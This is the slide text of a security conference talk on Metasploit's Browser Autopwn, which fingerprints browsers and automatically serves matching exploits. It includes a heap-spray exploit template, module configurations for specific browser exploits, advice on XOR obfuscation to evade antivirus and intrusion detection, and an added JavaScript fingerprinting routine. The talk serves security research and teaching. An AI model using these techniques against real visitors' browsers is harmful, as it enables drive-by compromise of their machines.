Automatic browser fingerprinting and exploitation with the Metasploit Framework: Browser Autopwn
James Lee

Browser Autopwn
- Auxiliary module for the Metasploit Framework
- Fingerprints a client
- Determines what exploits might work
- Used to suck
- Now it doesn't

Outline
- Intro
- Cluster bombs
- Guided missiles
- Fingerprinting and targeting
- Stealth
- Demos
- Commercial comparison

#whoami
- James Lee
- egypt
- Co-Founder, Teardrop Security
- Developer, Metasploit Project

My Involvement in MSF
- Started submitting patches and bug reports in 2007
- HD gave me commit access in April 2008
- Broke the repo April 2008

The Metasploit Framework
- Created by HD Moore in 2003
  - ncurses based game
- Later became a real exploit framework in perl
- Rewritten in ruby in 2005
  - Which is way better than python
- Extensible framework for writing exploits

I <3 MSF
- Modular payloads and encoders
- Many protocols already implemented
- Many non-exploit tools
- All kinds of exploits
  - Traditional server side
  - Client sides

Why Clientsides
- Karmetasploit
- Any other tool that gets you in the middle
- Users are weakest link, blah, blah, blah
- See Chris Gates

Client Exploits in MSF
- Extensive HTTP support
- Heap spray in two lines of code
- Sotirov's .NET DLL, heap feng shui
- Wide range of protocol level IDS evasion
- Simple exploit in ~10 lines of code
Simple Exploit

    content = %Q|<html><body>
    <object id='obj' classid='...'></object><script>
    #{js_heap_spray}
    sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000);
    obj.VulnMethod(#{[target.ret].pack('V') * 1000});
    </script></body></html>|
    send_response(client, content)
Or Arbitrarily Complex
- ani_loadimage_chunksize is 581 lines of code
- As of June 28, MSF has 85 browser exploit modules

Problem
Solution
Cluster Bomb Approach
- Is it IE? Send all the IE sploits
- Is it FF? Send all the FF sploits
- Originally exploits were ad hoc
- Pain in the ass when new sploits come out

Problem
Solution
Guided Missile Approach
- Better client and OS fingerprinting
- Only send exploits likely to succeed
  - less likely to crash or hang the browser
- Browser is IE7? Don't send IE6 sploits, etc.

Fingerprinting the Client
- User Agent
  - Easy to spoof
  - Easy to change in a proxy
  - A tiny bit harder to change in JS

Fingerprinting the Client
- Various JS objects only exist in one browser
- Some only exist in certain versions
  - window.createPopup, Array.every, window.Iterator
- Rendering differences and parser bugs
  - window.opera, Array.every
  - IE's conditional comments

Internet Explorer
- Parser bugs, conditional comments
- ScriptEngine*Version()
  - Reliable, but not precise
  - Almost unique across all combinations of client and OS
  - Brought to my attention by Jerome Athias

Opera
- window.opera.version()
  - Includes minor version, e.g. 9.61

Hybrid Approach for FF
- Existence of document.getElementsByClassName means Firefox 3.0
- If User Agent says IE6, go with FF 3.0
- If UA says FF 3.0.8, it's probably not lying, so use the more specific value

Safari
- Still in progress
- Existence of window.console
  - If Firebug is installed on FF, shows up there, too
- Availability of window.onmousewheel
  - Defaults to null, so have to check typeof

Fingerprinting the OS
- User Agent
- Could use something like p0f
- From the server side, that's about it

Internet Explorer
- Again, ScriptEngine*Version()
- Almost unique across all combinations of client and OS, including service pack

Opera
- Each build has a unique opera.buildNumber()
- Gives platform, but nothing else

Firefox
- navigator.platform and friends are affected by the User Agent string
- navigator.oscpu isn't
  - Linux i686
  - Windows NT 6.0

Others
- Really all we're left with is the User Agent
- That's okay, most don't lie
- And those that do are likely to be patched anyway
- Generic, works everywhere when UA is not spoofed
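The reconciliation the last few slides describe (an object that exists in only one browser overrides the User-Agent's family, navigator.oscpu overrides the UA's OS, and the finer UA version is kept when the family agrees), written out as an added JavaScript example. It is not from the talk or from Metasploit; the function names, the probe field names and the sample User-Agent strings are constructed here. Probe results are passed in as a plain object that a page would fill with typeof checks, so the logic runs and can be tested outside a browser. The point for defenders is the one the talk makes implicitly: rewriting the User-Agent header in a proxy or extension changes nothing about what script can observe, so a spoofed UA is not a control against this kind of detection.

```javascript
// Added example, not from the slides or from Metasploit. Reconciles the
// claimed User-Agent with JavaScript feature probes using the precedence
// the talk describes. Probe results arrive as a plain object (constructed
// here) so the logic runs in Node; in a page they would come from typeof checks.

// OS family from a User-Agent string or from navigator.oscpu
// (the talk's examples: 'Linux i686', 'Windows NT 6.0').
function osFamily(s) {
  if (/Windows/.test(s)) return 'Windows';
  if (/Linux/.test(s)) return 'Linux';
  if (/Mac OS X/.test(s)) return 'Mac OS X';
  return 'unknown';
}

// Coarse, server-side view: browser family, version and OS from the UA alone.
// Opera is tried first because some Opera UAs also carry an "MSIE" token.
function parseUserAgent(ua) {
  const claim = { browser: 'unknown', version: null, os: osFamily(ua) };
  const rules = [
    ['Opera',   /Opera[\/ ](\d+(?:\.\d+)*)/],
    ['Firefox', /Firefox\/(\d+(?:\.\d+)*)/],
    ['IE',      /MSIE (\d+(?:\.\d+)*)/],
    ['Safari',  /Version\/(\d+(?:\.\d+)*).*Safari\//],
  ];
  for (const [name, re] of rules) {
    const m = re.exec(ua);
    if (m) { claim.browser = name; claim.version = m[1]; break; }
  }
  return claim;
}

// Fine, client-side view. `probes` fields (all optional; names are assumptions):
//   hasWindowOpera, operaVersion, operaBuildNumber   -> window.opera.*
//   hasCreatePopup, scriptEngineVersion              -> IE only
//   hasGetElementsByClassName, hasArrayEvery, hasIterator
//   oscpu                                            -> navigator.oscpu (Firefox)
function fingerprint(ua, probes) {
  const claim = parseUserAgent(ua);
  const fp = { browser: claim.browser, version: claim.version, os: claim.os,
               uaSpoofed: false, evidence: [] };

  // 1. Browser family: an object that exists in only one browser beats the UA.
  let detected = null;
  let detectedVersion = null;
  if (probes.hasWindowOpera) {
    detected = 'Opera';
    detectedVersion = probes.operaVersion || null;   // includes minor version, e.g. '9.61'
    fp.evidence.push('window.opera');
  } else if (probes.hasCreatePopup || probes.scriptEngineVersion) {
    detected = 'IE';                                  // ScriptEngine*Version(): reliable, not precise
    fp.evidence.push(probes.hasCreatePopup ? 'window.createPopup' : 'ScriptEngine*Version()');
  } else if (probes.hasGetElementsByClassName || probes.hasIterator || probes.hasArrayEvery) {
    detected = 'Firefox';
    // Hybrid rule from the talk: getElementsByClassName alone only says "3.0".
    detectedVersion = probes.hasGetElementsByClassName ? '3.0' : null;
    fp.evidence.push(probes.hasGetElementsByClassName ? 'document.getElementsByClassName'
                                                      : 'Array.every / window.Iterator');
  }

  if (detected !== null) {
    if (detected !== claim.browser) {
      // UA lied about the family: trust the object, and only the coarse version it implies.
      fp.uaSpoofed = true;
      fp.browser = detected;
      fp.version = detectedVersion;
    } else if (detected === 'Opera' && detectedVersion) {
      fp.version = detectedVersion;                  // opera.version() is the better source
    } else if (!fp.version) {
      fp.version = detectedVersion;                  // UA agrees on family: keep its finer version
    }
  }

  // 2. OS: script-visible sources beat the UA where the talk found one.
  if (fp.browser === 'Firefox' && probes.oscpu) {
    const os = osFamily(probes.oscpu);                // navigator.oscpu ignores UA overrides
    if (os !== 'unknown' && os !== fp.os) fp.uaSpoofed = true;
    if (os !== 'unknown') fp.os = os;
    fp.evidence.push('navigator.oscpu=' + probes.oscpu);
  } else if (fp.browser === 'IE' && probes.scriptEngineVersion) {
    fp.scriptEngine = probes.scriptEngineVersion;    // would map to client+OS+SP via a lookup table (not included)
  } else if (fp.browser === 'Opera' && probes.operaBuildNumber) {
    fp.operaBuild = probes.operaBuildNumber;         // gives platform, nothing else
  }
  return fp;
}

// Constructed sample: the UA claims IE6 on Windows XP, but the page sees
// Firefox 3 objects and a Linux navigator.oscpu.
const sample = fingerprint('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
  { hasGetElementsByClassName: true, hasArrayEvery: true, oscpu: 'Linux i686' });
console.log(JSON.stringify(sample));
```

The `evidence` array is the part a defender cares about: it records which script-visible property contradicted the header, which is what a privacy review of a UA-spoofing setup needs to see. Safari is left to the UA because the talk marks its detection as still in progress.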
Future Fingerprinting
- QuickTime
- Adobe
- Less well known third party stuff

ActiveX
- new ActiveXObject() works if you have the classname
- Otherwise, IE doesn't seem to have a generic way to tell if an ActiveX object got created
  - document.write("<object ...>")
  - document.createElement("object")

Solution
- typeof(obj.method)
  - 'undefined' if the object failed to initialize
  - 'unknown' or possibly a real type if it worked

Target Acquired
What is it Vulnerable to?
- Coarse determination server side
  - Server sends sploits that match the browser and OS, possibly version
- Fine determination client side
  - JavaScript builds fingerprint, sends it back to the server
  - navigator.javaEnabled exists, try mozilla_navigatorjava

Select a Missile
- Sort by reliability
- Exploits contain their own JS tests

Problem
Solution
Obfuscation
- Randomize identifiers
- Build strings from other things
- JSON/AJAX
- Obfuscation is not crypto

Encryption
- Put a key in the URL
  - Not available in the standalone script
- Simple XOR is enough to beat AV and NIDS
- If they figure it out, it's easy to make the crypto stronger

Demonstrations

And we're back...
- I hope that worked
- Now how do YOU make exploits work within this framework?

Writing Exploits
- Add autopwn_info() to top of exploit class
- :ua_name is an array of browsers this exploit will work against
- :vuln_test is some javascript to test for the vulnerability (unless it's ActiveX)
  - Usually comes directly from the exploit anyway
Example: mozilla_navigatorjava

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
      :ua_name    => HttpClients::FF,
      :javascript => true,
      :rank       => NormalRanking, # reliable memory corruption
      :vuln_test  => %Q|
        if (
          window.navigator.javaEnabled &&
          window.navigator.javaEnabled()
        ) {
          is_vuln = true;
        }
      |,
    })
Example: ms06_067_keyframe

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
      :ua_name    => HttpClients::IE,
      :javascript => true,
      :os_name    => OperatingSystems::WINDOWS,
      :vuln_test  => 'KeyFrame',
      :classid    => 'DirectAnimation.PathControl',
      :rank       => NormalRanking # reliable memory corruption
    })
Example: winzip_fileview

    include Msf::Exploit::Remote::BrowserAutopwn
    autopwn_info({
      :ua_name    => HttpClients::IE,
      :javascript => true,
      :os_name    => OperatingSystems::WINDOWS,
      :vuln_test  => 'CreateFolderFromName',
      :classid    => '{A09AE68F-B14D-43ED-B713-BA413F034904}',
      :rank       => NormalRanking # reliable memory corruption
    })
Browser Autopwn Summary
- Reliable Target Acquisition
- Smart Missile Selection
- Stealthy from an AV perspective
- Easy to extend
- Detection results stored in a database

Commercial Comparison
- Mpack
- Firepack
- Neosploit
- Luckysploit

Mpack, Firepack
- Hard to acquire
- Old exploits
- Detection is only server side
- Hard to change or update exploits
- Obfuscation + XOR

Neosploit
- Compiled ELFs run as CGI
- Unless you get the source or do some RE, you won't really know what it does

Luckysploit
- Real crypto (RSA, RC4)
- Even harder to acquire

Browser Autopwn
- Easy to write new exploits or take out old ones
- Free (three clause BSD license)
- Easy to get (http://metasploit.com)
- Not written in PHP
- OS and client detection is client side, more reliable in presence of spoofed or borked UA

Future
- More flexible payload selection
- Stop when you get a shell
  - Maybe impossible in presence of NAT/proxies
- Easier to use JS obfuscation
- UAProf for mobile devices
- Integration with MetaPhish

Download it
- svn co http://metasploit.com/svn/framework3/trunk
- Submit patches to msfdev@metasploit.com

Thanks
- hdm, valsmith, tebo, mc, cg, Dean de Beer, pragmatk
- Everybody who helped with testing
- Whoever created ActiveX